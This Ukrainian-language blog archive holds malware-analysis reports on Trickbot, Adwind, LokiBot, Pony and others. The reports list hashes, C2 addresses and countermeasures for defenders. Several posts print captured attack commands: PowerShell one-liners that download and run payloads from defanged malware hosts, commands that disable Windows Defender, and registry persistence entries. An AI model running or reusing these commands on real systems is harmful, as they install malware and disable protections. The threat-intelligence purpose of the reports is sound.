Tag Archive | trickbot

IOC_digest_02_2019

(Зразки за лютий 2019го)

Продовжуючи формат переднього дайджесту, ось вам перелік зразків, результати аналізу яких я можу оприлюднити:

01/02/19

розсилали #TVRat, (.pdf.scr) > %temp%\1.exe > AppData\Roaming\d4igle\svcc.exe , звіт

06/02/19

розсилали #Trickbot, .xls > macro > cmd > powershell > GET 2 URL > $env:temp+’\tmp1806.exe , звіт

07/02/19 – високий рівень складності та загрози, без EXE файлів (!)

розсилали #SobakenRAT, .lnk > powershell > get base64 > decode > fingerprint system > POST b64 on C2 , звіт

12/02/19

розсилали #Lokibot, .RAR > bat > exe , звіт

20/02/19

розсилали #shade, URL > GET .ZIP > JS > WSH > GET .jpg > %temp%\*.tmp , звіт

25/02/19

розсилали #shade, URL > GET .ZIP > JS > WSH > GET .jpg > %temp%\*.tmp , звіт

розсилали #coinminer, .SCR > C:\Intel\* , звіт

26/02/19

 

розсилали #formbook, doc1 > xml.rels > GET1 > doc2 > 11882 > GET2 > \Public\vbc.exe , звіт

27/02/19

розсилали #smokeloader, (lzh) > js > WSH > GET 2 URL > AppData\Roaming\Microsoft\Windows\Templates\??????.exe , звіт

розсилали #fareit, .doc (RTF) > 11882 > GET URL > \appdata\roaming\*.exe , звіт

– – – – – – – – – – – – – – – – – – – – – – –

Аналітика

Методи доставки

Для обходу фільтрів продовжують застосовувати такі методи:

Якщо розбити по категоріям, тоді отримаємо

Тенденції

Кампанія з розповсюдження ransomware #shade яка розпочалася ще в кінці 2018 року продовжувалась із переключенням з приєднань на посилання на JS (WSH).

Варто виділити цільову атаку із застосуванням LNK на PowerShell (#sobaken), яка проводилась без жодних exe файлів. Це той рівень, до якого усім потрібно бути готовими.

Крім того, цікавим є спосіб доставки у #formbook – два документи, перший з xml.rels, а другий із 11882.

Усе, що присилали в лютому могло створити інциденти тим організаціям які:

  • не контролюють макроси
  • не контролюють WSH
  • не королюють запуск powershell
  • не посилили фільтрацію приєднань

Узагальнені контрзаходи

Будьте уважні та обережні.

VR

Advertisements

IOC_Trickbot_051018

05/10/18 проходила чергова розсилка #Trickbot

Як ми і прогнозували, аналізуючи розсилку 2го числа, настала черга наших організацій.
Цього разу у списках розсилки є вітчизняні компанії.

Проте є істотні відмінності від попереднього зразка:

  • Схема стара (без посилання), документ із макросом у приєднанні
  • Відсутня перевірка зовнішньої IP адреси
  • Після активації основного тіла іде довантаження двох копій у вигляді png із різними контрольними сумами

Як і минулого разу – крім збережених паролів, на інфікованій системі знімається інформація про список процесів та мережеві параметри і оточення.

Мережеві маркери:
– – – – – – – – – – – – – – – – – –
107.180.51.22 pixandflix.com GET /ch.rome HTTP/1.1 no User Agent !This program cannot be run in DOS mode.
185.17.123.2 185.17.123.2 GET /radiance.png HTTP/1.1 no User Agent !This program cannot be run in DOS mode.
185.17.123.2 185.17.123.2 GET /table.png HTTP/1.1 WinHTTP loader/1.0 !This program cannot be run in DOS mode.
185.17.123.2 185.17.123.2 GET /table.png HTTP/1.1 WinHTTP loader/1.0 !This program cannot be run in DOS mode.
37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1 Mozilla/4.0
37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1 Mozilla/4.0
37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/90 HTTP/1.1 test
37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ TTP/1.1 Mozilla/4.0
# # #

Більше маркерів (чорновик звіту) за посиланням:
https://pastebin.com/75KNqwCf

Контрзаходи:

• Блокуйте запуск макросів,
• Забороняйте завантаження запускних файлів в явному вигляді,
• Контролюйте powershell,
• Блокуйте на Proxy нетипові User Agent.

Будьте уважні та обережні.

VR

IOC_Trickbot_021018

02/10/18 проходила розсилка троянського шкідливого коду типу #Trickbot

Ця розсилка не була направлена на українські організації.
Але ми вирішили розглянути її аби попередити вас.
Адже через кілька днів цю саму схему ймовірно застосують проти нашого сегменту.

Отже зміни у схемі доставки – замість приманки у приєднанні листа, жертву скеровують
На сторінку, з якої завантажується документ із начинкою.
Схема: email > html > URL1 > doc > macro > powershell > URL2 > %tmp%\now.exe
Ступінь загрози – високий (для компаній, що не блокують макроси).

(!) Зверніть увагу, що крім збережених паролів, на інфікованій системі знімається інформація про список процесів та мережеві параметри і оточення.

Мережеві маркери:
– – – – – – – – – – – – – – – – – –
138.128.75.133 wormaldfj{.} com GET /cantbe.played HTTP/1.1 no User Agent
198.27.74.146 wtfismyip{.} com GET /text HTTP/1.1 Mozilla/5.0
66.181.167.72 66.181.167.72 POST /ser1002us/APM11_W617601.IDxxx/81/ HTTP/1.1 Mozilla/4.0
66.181.167.72 66.181.167.72 POST /ser1002us/APM11_W617601.IDxxx/81/ HTTP/1.1 Mozilla/4.0
66.181.167.72 66.181.167.72:8082 POST /ser1002us/APM11_W617601.IDxxx/90 HTTP/1.1 test
# # #

Більше маркерів (чорновик звіту) за посиланням:
https://pastebin.com/fm5Ug69G

Контрзаходи:

• Блокуйте запуск макросів,
• Забороняйте завантаження запускних файлів в явному вигляді,
• Контролюйте powershell
• Блокуйте на Proxy нетипові User Agent.

Будьте уважні та обережні.

VR

IOC_Trickbot_040718

Доброго ранку, панове.

 

Вчора отримали на аналіз зразок документу з макросом, активація якого призводить до інфікування #Trickbot.

Обидва джерела досі активні, а основне тіло активно передає інформацію з інфікованих систем.

Є відмінності в способі доставки порівняно із зразком який ми розглядали 11/06.

Рівень загрози, для організацій котрі не блокують макроси, не контролюють PowerShell – високий.

А для тих, хто уважно читає наші поради – низький.

Нагадую, що #Trickbot є модульним ШПЗ, яке використовується для збору даних та стеження.

Може довантажувати різні модулі для шифрування або віддаленого керування.

На що треба звернути увагу:

  • Обидва сервери, що розповсюджують частини malware досі активні
  • Сервер контролю той же самий що і 11/06
  • Передача зібраних даних із User Agent ‘Test’
  • Завантаження payload силами powershell через його виклик з cmd
  • Шлях та ім’я з яким записується і запускається payload рандомні
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Payload завантажуєтеся по захищеному протоколу (Cloudflare)
  • Виконання проходить із затримкою ~2-3 хв
  • Зразок не зачищає за собою файли у %tmp% після міграції в %apdata%
  • Спроб закріплення не проводив
  • Натомість намагається відключити Windows Defender
  • Перевірку IP та звернення до Windows Update здійснює основне тіло
  • Зразок також довантажує з windowsupdate.com кореневі сертифікати
  • А от передача зібраних даних уже через інжектований svchost
  • Прав Адміністратора не потребує

І так, проблеми будуть у тих, хто:

  • Не блокують макроси (90% державних установ)
  • Не заборонили завантаження через powershell (більше 50% організацій)
  • На блокують несанкціоноване завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

Схема атаки:

Email attach (.doc) > vba macro > cmd > powershell > 2 URL > GET bri.ri > %tmp%\%random%.exe

Маркери IOC:

документ

SHA-256    fe0f98f1f0f64564150aa919ed1eed350ec6bec96eba7e08a605124afa6fe6aa
File name   in.doc
File size      80.5 KB

 

Макрос містить 2 URL:

h11p:\meanmuscles{.} com/bri.ri  + active
h11p:\icoindna{.} io/bri.ri      + active

 

основна частина

SHA-256        481fda910780812056f5dbe6a5f534ad114b527f0386933febca56b738300b54
File name   bri.ri  >> %tmp%\%random%.exe !This program cannot be run in DOS mode.
File size      316 KB

 

Відкриває з’єднання із С2

h11p\188.124.167.132:8082 POST /ser0704/hostname.UID     HTTP/1.1    test (UA)

минулого разу:
h11p\188.124.167.132:8082 POST /ser0611/hostname.UID     HTTP/1.1    test (UA)

 

Активність по процесам:

“C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE” /n /dde

C:\Windows\SysWOW64\cmd.exe /c powershell “‘powershell “”function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,”%tmp%\uauuind.exe”);start-process ”%tmp%\uauuind.exe”;}try{dodjq(”h11p:\icoindna {.}io/bri.ri’‘)}catch{dodjq(”h11p:\meanmuscles {.}com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\wswjdpihx.bat; start-process ‘%tmp%\wswjdpihx.bat’ -windowstyle hidden”

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell  “‘powershell “”function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,”C:\tmp\uauuind.exe”);start-process ”C:\tmp\uauuind.exe”;}try{dodjq(”h11p:\icoindna {.}io/bri.ri”)}catch{dodjq(”h11p:\meanmuscles {.}com/bri.ri”)}'”” | out-file -encoding ascii -filepath C:\tmp\wswjdpihx.bat; start-process ‘C:\tmp\wswjdpihx.bat’ -windowstyle hidden”

C:\Windows\SysWOW64\cmd.exe  /c “”C:\tmp\wswjdpihx.bat” “

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell  “function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,’C:\tmp\uauuind.exe’);start-process ‘C:\tmp\uauuind.exe’;}try{dodjq(‘h11p:\icoindna {.}io/bri.ri’)}catch{dodjq(‘h11p:\meanmuscles {.}com/bri.ri’)}

“C:\tmp\uauuind.exe”

C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend

C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend

C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Users\operator\AppData\Roaming\msscsc\uauuind.exe

C:\Windows\system32\svchost.exe

 

Зверніть увагу на рандом макросу:

1st run

——-

cmd /c powershell “‘powershell “”function ysga([string] $bmecmdmov){(new-object system.net.webclient).downloadfile($bmecmdmov,”%tmp%\xpvsvgw.exe”);start-process ”%tmp%\xpvsvgw.exe”;}try{ysga(”h11p:\icoindna{.} io/bri.ri”)}catch{ysga(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\dduuyd.bat; start-process ‘%tmp%\dduuyd.bat’ -windowstyle hidden”

 

2nd run

——-

cmd /c powershell “‘powershell “”function bxode([string] $wxhfe){(new-object system.net.webclient).downloadfile($wxhfe,”%tmp%\nsxr.exe”);start-process ”%tmp%\nsxr.exe”;}try{bxode(”h11p:\icoindna{.} io/bri.ri”)}catch{bxode(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\ktph.bat; start-process ‘%tmp%\ktph.bat’ -windowstyle hidden”

 

3rd run

——-

cmd /c powershell “‘powershell “”function nnpsd([string] $knhvd){(new-object system.net.webclient).downloadfile($knhvd,”%tmp%\bixi.exe”);start-process ”%tmp%\bixi.exe”;}try{nnpsd(”h11p:\icoindna{.} io/bri.ri”)}catch{nnpsd(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\wjqw.bat; start-process ‘%tmp%\wjqw.bat’ -windowstyle hidden”

 

Збір інформації вбудованими засобами ОС:

C:\Windows\system32\cmd.exe /c ipconfig /all

C:\Windows\system32\cmd.exe /c net config workstation

C:\Windows\system32\cmd.exe /c net view /all

C:\Windows\system32\cmd.exe /c net view /all /domain

C:\Windows\system32\cmd.exe /c nltest /domain_trusts

C:\Windows\system32\cmd.exe /c nltest /domain_trusts /all_trusts

 

Мережеві IOC:

Завантаження основного тіла:

104.27.25.56      icoindna {.}io               GET /bri.ri HTTP/1.1     noUA
68.65.120.85      meanmuscles{.} c0m           GET /bri.ri HTTP/1.1     noUA

Минулого разу:
68.65.120.85      onetimewonders{.} c0m       GET /no.bin HTTP/1.1   noUA

 

Перевірка Public IP:

34.224.244.1      checkip.amazonaws {.}com  GET / HTTP/1.1   Mozilla/5.0

 

Передача інформації про інфіковану систему:

188.124.167.132:8082         POST /ser0704/hostname_UID HTTP/1.1 test

 

Трафік інфікованої системи:

[System Process] 49167        83.220.168.209   447   TIME_WAIT                                                                       
svchost.exe        49165        109.234.34.106   443   ESTABLISHED                                                                            
svchost.exe        49170        188.124.167.132 8082 CLOSE_WAIT                                                                             
svchost.exe        49171        109.234.34.106   443   ESTABLISHED                                                                            
svchost.exe        49172        62.140.236.163   80     ESTABLISHED

 

Яку інформацію отримують нападники:

 

POST /ser0704/hostname_UID HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 188.124.167.132:8082
Content-Length: 5007
Cache-Control: no-cache

--Arasfjasu7

Content-Disposition: form-data; name="proclist"

                ***PROCESS LIST***

[System Process]
System
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
lsm.exe
svchost.exe
...

--Arasfjasu7
Content-Disposition: form-data; name="sysinfo"

                ***SYSTEMINFO***

Host Name - APM11
OS Name - Microsoft Windows 7 ..........................
OS Version - Service Pack 1
OS Architecture - 64-bit
Product Type - Workstation
Build Type - Multiprocessor Free
Registered Owner - operator
Total Physical Memory - 2371 Mb
Available Physical Memory - 2371 Mb

                /c ipconfig /all

                /c net view /all

                /c net view /all /domain

                /c nltest /domain_trusts

                /c nltest /domain_trusts /all_trusts

--Arasfjasu7--
HTTP/1.1 200 OK
server: Cowboy
date: Wed, 04 Jul 2018 18:34:28 GMT
content-length: 3
Content-Type: text/plain
- - - - - - - - - - - - - - - - - - - 

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Блокування на Proxy вихідних з’єднань без User Agent та з UA ‘test’
  • Блокування несанкціонованої доставки запускних на рівні Web та Email шлюзів
  • По можливості – відмова від макросів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона специфічного виклику PowerShell – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_digest_0618

Усім привіт.

Через брак часу та велику кількість зразків надсилаю стислий дайджест того, що присилали наприкінці червня:

 

140618 

#LokiBot #lokibot

SHA-256               7df5d234ba9b5de40e8dae695471f2a0362de10177e3518eb7f9e8c172b47643
File name            PAYMENT SWIFT PDF.iso
File size 696 KB


SHA-256               1800b88ea906961b4ecfd374756cb2c7f0273c6048c04497e315224484cf659e
File name            PAYMENT SWIFT PDF.exe
File size 636 KB

 

h11p://ponsse{.} site/nzube/fre.php

104.28.26.87       ponsse{.} site     POST /nzube/fre.php HTTP/1.0 Mozilla/4.08 (Charon; Inferno)  

 

– – – – – – – – – – –

150618

#js #grandcrab

SHA-256               85838b0cbd2beac5e91b24afbf7a36156b2270bc0c874b6377541740b74a9851
File name            20188946_894679.jpg.zip
File size 21.92 KB

SHA-256               1f26017ef432aee644400e4854e54ff330c797ea8eb79190368fed9cf630377b
File name            e233d4ac26fee5ff56a6536d0db7373217b4c4a7
File size 21.78 KB

SHA-256               eb371764b422e9384e3fb8cbb12112e64666c362758c62bcabbd9f17c7d94341
File name            crabin.exe
File size 207.51 KB

 

h11p://92.63.197{.} 60/crabin.exe?agQefX

92.63.197.60       92.63.197.60       GET /crabin.exe?agQefX HTTP/1.1                            80           HTTP      133

66.171.248.178  carder{.} bit        GET / HTTP/1.1 Mozilla/5.0

217.156.87.2       carder{.} bit        POST /eeb?eyge=ies HTTP/1.1  (application/x-www-form-urlencoded)    Mozilla/5.0

 

#Trickbot

SHA-256               5e7a1ed5f9a1fbc9d7148fbc28a379dc0067508844b6d342084d26b75c995d4f
File name            75812277127A00113A.doc
File size 69 KB

 

macro > cmd > powershell > GET

 

h11p://onetimewonders{.} com/no.bin (!)

h11p://nepalhiking{.} com/no.bin (404)

 

SHA-256               503c5c3cb68e1e057df4b99fe338d65d44d4c6e1f49396929d3fff66044505af
File name            no.bin   !This program cannot be run in DOS mode.
File size 338 KB

 

h11p\188.124.167.132:8082/ser0611/

 

– – – – – – – – – – –

190618

 

#adwind

SHA-256               2a6ea5647c951659854df5bc3437462294815da880872cc93e96fc01cccd85e4
File name            ORDER SAMPLE.jar
File size 479.42 KB

 

javaw.exe  197.211.59.160  pmanlog.ddns{.} net

 

proc

"C:\Program Files\Java\jre1.8.0_171\bin\javaw.exe" -jar "C:\Users\operator\Desktop\adwind1906.jar"
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
"C:\Program Files\Java\jre1.8.0_171\bin\java.exe" -jar C:\tmp\_0.32649732458480233098419347231064428.class
cmd.exe /C cscript.exe C:\tmp\Retrive6508158100243133376.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive3329749612520250823.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
cmd.exe /C cscript.exe C:\tmp\Retrive6611168625816267695.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive35953365366553471.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v extjXQeGNff /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\RmAnqeogmJS\ZQaAquQZKoS.tUCacg\"" /f
attrib +h "C:\Users\operator\RmAnqeogmJS\*.*"
attrib +h "C:\Users\operator\RmAnqeogmJS"
C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\operator\RmAnqeogmJS\ZQaAquQZKoS.tUCacg
C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe -jar C:\tmp\_0.64094332285124526171507674142480917.class
cmd.exe /C cscript.exe C:\tmp\Retrive4167831113503291950.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive4003874893192164925.vbs
taskkill /IM UserAccountControlSettings.exe /T /F
cmd.exe /c regedit.exe /s C:\tmp\UjxCMXPFhx4211656766753692948.reg
taskkill /IM Taskmgr.exe /T /F
WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
taskkill /IM PSUAMain.exe /T /F

 

comp

java.exe               1964       TCP        127.0.0.1              50131    127.0.0.1              7777       SYN_SENT

javaw.exe           2772       TCP        10.0.2.15              50102    185.208.211.142                3382       ESTABLISHED

 

#pony (fareit)

SHA-256               c0c4ad871ffe0231961fb2d77ee575c07e4ade470b0d6c84faa7f92ba511ee64
File name            decoded.gz
File size 188.51 KB



SHA-256               5dda41fb0abc6528d80995aedb47c0b59fc6467e7307bbdc75d097aef50fcd21
File name            deed.exe
File size 672 KB

 

185.6.242.251     hosedoin{.} ml   POST /fiv/roks/gate.php HTTP/1.0            Mozilla/4.0

 

– – – – – – – – – – –

200618

#adwind #jar

 

proc

—-

"C:\Program Files\Java\jre1.8.0_171\bin\javaw.exe" -jar "C:\Users\operator\Desktop\adwind20.jar"
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
C:\Program Files\Java\jre1.8.0_171\bin\java.exe" -jar C:\tmp\_0.54780904655995994375189407378187035.class
cmd.exe /C cscript.exe C:\tmp\Retrive6543292869224297367.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive4922912961062946918.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
cmd.exe /C cscript.exe C:\tmp\Retrive2680843125772440624.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive8763095501247174336.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ZllOQijdfpg /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\VGyRmlBYozs\CFiYFpKudNh.vaZoLR\"" /f
attrib +h "C:\Users\operator\VGyRmlBYozs\*.*"
attrib +h "C:\Users\operator\VGyRmlBYozs"
C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\operator\VGyRmlBYozs\CFiYFpKudNh.vaZoLR
C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe -jar C:\tmp\_0.7762377356869443373969133677298847.class
cmd.exe /C cscript.exe C:\tmp\Retrive5882107392697143603.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive1289986287422620902.vbs
taskkill /IM UserAccountControlSettings.exe /T /F
cmd.exe /c regedit.exe /s C:\tmp\DpVePFPaGi2225327046919394054.reg
taskkill /IM Taskmgr.exe /T /F

 

comp

—-

java.exe               3740       TCP        127.0.0.1              50177    127.0.0.1              7777       SYN_SENT

javaw.exe           3136       TCP        10.0.2.15              50176    185.208.211.138                4573       SYN_SENT

 

#pony #fareit

SHA-256               b3468cc1949f8686bd2bc8bda351dc4b31a45f9fcf6c2ea27279421c4465c431
File name            HSBC COPY.docx - clean
File size 76.05 KB


SHA-256               64fd95c4c13fadee7b5fbbe946f0bd66cce07a5a6488c2bc95faefb0098aa97d
File name            PAYMENTCOPY_PDF.exe
File size 50.55 MB

 

h11p://cellimark{.} com/yangzhouming/coreserver/gate.php

h11p://cellimark{.} com/yangzhouming/coreserver/shit.exe  – 404

 

103.63.2.238       cellimark{.} com                POST /yangzhouming/coreserver/gate.php HTTP/1.0       Mozilla/4.0

103.63.2.238       cellimark{.} com                GET /yangzhouming/coreserver/shit.exe HTTP/1.0            Mozilla/4.0                 – 404

– – – – – – – – – – –

Контрзаходи незмінні.

Хто забув чи не знав – дивіться попередні звіти по цим сімействам:

 

#LokiBot              https://radetskiy.wordpress.com/?s=lokibot

#TrickBot             https://radetskiy.wordpress.com/?s=trickbot

#Adwind              https://radetskiy.wordpress.com/?s=adwind

#Pony                   https://radetskiy.wordpress.com/?s=pony

 

Вдалого дня.

Будьте уважні та обережні!

VR

IOC_Trickbot_110618

Доброго ночі, панове.

Перепрошую, що турбую в неробочий час, але інформація важлива.

В минулий понеділок, 11го числа, після обіду походила розсилка документів з макросами,

активація яких призводила до інфікування систем трояном типу #Trickbot.

Ми отримали зразок фішингового листа від однієї з компаній лише кілька годин тому:

Приманка досі функціонує, а основне тіло активно передає інформацію з інфікованих систем.

Шість днів поспіль вони продовжують збирати інформацію.

Так, уже майже усі антивіруси внесли і документ і payload в свої сигнатури.

Але ми дбаємо про вас, тому вирішили надати звіт із маркерами щоб ви могли пересвідчитися, що ваші системи ця зараза оминула.

Нагадую, що #Trickbot є модульним ШПЗ, яке використовується для збору даних та стеження.

Може довантажувати різні модулі для шифрування або віддаленого керування.

Рівень загрози, для організацій котрі не блокують макроси та не контролюють PowerShell і створення .exe, – високий.

А для тих, хто уважно читає наші поради – низький.

На що треба звернути увагу:

  • Один із серверів, що розповсюджує частини malware досі активний
  • Завантаження payload силами powershell через його виклик з cmd
  • Шлях та ім’я з яким записується і запускається downloader чітко вказані (not random)
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Виконання проходить із затримкою ~2-3 хв
  • Зразок не зачищає за собою файли у %temp% після міграції в %apdata%
  • Перевірку IP та звернення до Windows Update здійснює процес Oeuin_r.exe
  • Зразок також довантажує з windowsupdate.com кореневі сертифікати
  • А от передача зібраних даних уже через інжектований svchost
  • Прав Адміністратора не потребує

І так, проблеми будуть у тих, хто:

  • Не блокують макроси (90% державних установ)
  • Не заборонили завантаження через powershell (більше 50% організацій)
  • Не заборонили мережевий трафік для powershell (більше 50% організацій)
  • На блокують несанкціоноване завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

 Схема атаки:

Email attach (.doc) > macro > cmd > powershell > 2 URL > GET no.bin > %temp%\Oeuin_r.exe

Маркери IOC:

документ

SHA-256        5e7a1ed5f9a1fbc9d7148fbc28a379dc0067508844b6d342084d26b75c995d4f
File name   75812277127A00113A.doc
File size      69 KB

Макрос містить 2 URL:

h11p:\onetimewonders{.} com/no.bin    (!) досі активний

h11p:\nepalhiking{.} com/no.bin           (404) файл вже видалено

сновна частина

SHA-256    503c5c3cb68e1e057df4b99fe338d65d44d4c6e1f49396929d3fff66044505af
File name   no.bin       >> %temp%\Oeuin_r.exe        !This program cannot be run in DOS mode.
File size      338 KB

Відкриває з’єднання із С2

h11p\188.124.167.132:8082/ser0611/hostname.UID

Активність по процесам:

"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde

"C:\Windows\System32\cmd.exe" /c PowerShell "'PowerShell ""function mhioxqxcz1([String] $lcambw5)

{(New-Object System.Net.WebClient).DownloadFile($lcambw5,''C:\tmp\Oeuin_r.exe'');

Start-Process ''C:\tmp\Oeuin_r.exe'';}try{mhioxqxcz1(''h11p\onetimewonders{.} c0m/no.bin'')}catch{mhioxqxcz1(''h11p\nepalhiking{.} c0m/no.bin'')}'""

| Out-File -encoding ASCII -FilePath C:\tmp\wcwwirbmn.bat;Start-Process 'C:\tmp\wcwwirbmn.bat' -WindowStyle Hidden"

C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\wcwwirbmn.bat" "

PowerShell  "function mhioxqxcz1([String] $lcambw5){(New-Object System.Net.WebClient).

DownloadFile($lcambw5,'C:\tmp\Oeuin_r.exe');

Start-Process 'C:\tmp\Oeuin_r.exe';}try{mhioxqxcz1('h11p\onetimewonders{.} c0m/no.bin')}catch{mhioxqxcz1('h11p\nepalhiking{.} c0m/no.bin')}

"C:\tmp\Oeuin_r.exe"

C:\Users\operator\AppData\Roaming\coplane\Oeuin_s.exe

C:\Windows\system32\svchost.exe

Збір інформації вбудованими засобами ОС:

C:\Windows\system32\cmd.exe /c ipconfig /all

C:\Windows\system32\cmd.exe /c net config workstation

C:\Windows\system32\cmd.exe /c net view /all

C:\Windows\system32\cmd.exe /c net view /all /domain

C:\Windows\system32\cmd.exe /c nltest /domain_trusts

C:\Windows\system32\cmd.exe /c nltest /domain_trusts /all_trusts

Закріплення через планувальник задач:

\MsWinToken      c:\users\operator\appdata\roaming\coplane\oeuin_s.exe        11.06.2018 10:46

Мережеві IOC:

Завантаження основного тіла:

68.65.120.85      onetimewonders{.} c0m       GET /no.bin HTTP/1.1

Перевірка Public IP:

216.239.32.21    ipinfo.io     GET /ip      HTTP/1.1    Mozilla/5.0

Комунікація з Windows Update (довантаження кореневих сертифікатів):

91.223.19.232    www.download.windowsupdate.com       GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1   Microsoft-CryptoAPI/6.1

Трафік інфікованої системи:

svchost.exe 2948 TCP   216.239.32.21    80     ESTABLISHED

svchost.exe 2948 TCP   200.111.167.227 449   ESTABLISHED

svchost.exe 2948 TCP   91.223.19.232    80     ESTABLISHED

svchost.exe 2948 TCP   37.230.113.54    447   ESTABLISHED

svchost.exe 2948 TCP   200.111.167.227 449   ESTABLISHED

svchost.exe 2948 TCP   65.30.201.40      443   SYN_SENT

Передача інформації про інфіковану систему:

188.124.167.132:8082         POST /ser0611/hostname_UID HTTP/1.1 test

А тепер саме головне – яку інформацію отримують нападники:

POST /ser0611/APM11_W617601.66340B99AFAFEB9431CE688A2D6B8FF8/90 HTTP/1.1

Content-Type: multipart/form-data; boundary=Arasfjasu7

User-Agent: test

Host: 188.124.167.132:8082

Content-Length: 4941

Cache-Control: no-cache

–Arasfjasu7

Content-Disposition: form-data; name=”proclist”

 

***PROCESS LIST***

[System Process]

System

smss.exe

csrss.exe

wininit.exe

csrss.exe

winlogon.exe

services.exe

lsass.exe

lsm.exe

–Arasfjasu7

Content-Disposition: form-data; name=”sysinfo”

 

***SYSTEMINFO***

Host Name – APM11

OS Name – Microsoft Windows 7 ……………………..

OS Version – Service Pack 1

OS Architecture – 64-bit

Product Type – Workstation

Build Type – Multiprocessor Free

Registered Owner – operator

Registered Organization –

Serial Number – 55041-007-1767687-86688

Install Date – 30/12/1899 00.00.00

Last Boot Up Time – 30/12/1899 00.00.00

Windows Directory – C:\Windows

System Directory – C:\Windows\system32

Boot Device – \Device\HarddiskVolume1

Total Physical Memory – 3651 Mb

Available Physical Memory – 3651 Mb

/c ipconfig /all

Ethernet adapter eth0:

….

/c net config workstation

…… ………………..                                \\APM11

………… …… ………………..                         APM11

…… ……………………                              operator

/c net view /all

.. ………… …… ……………….

/c net view /all /domain

.. ………… …… ……………….

/c nltest /domain_trusts

…. ………….. …………………. ………….. …………: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

/c nltest /domain_trusts /all_trusts

…. ………….. …………………. ………….. …………: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

–Arasfjasu7–

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Блокування несанкціонованої доставки запускних на рівні Web та Email шлюзів
  • Перевірка каталогів
    • %temp%\Oeuin_r.exe
    • %temp%\wcwwirbmn.bat
    • %appdata%\coplane\Oeuin_s.exe
  • Перевірка планувальника системи на наявність задачі \MsWinToken         c:\users\%жертва%\appdata\roaming\coplane\oeuin_s.exe
  • По можливості – відмова від макросів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона специфічного виклику PowerShell та виконання кодованих команд – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
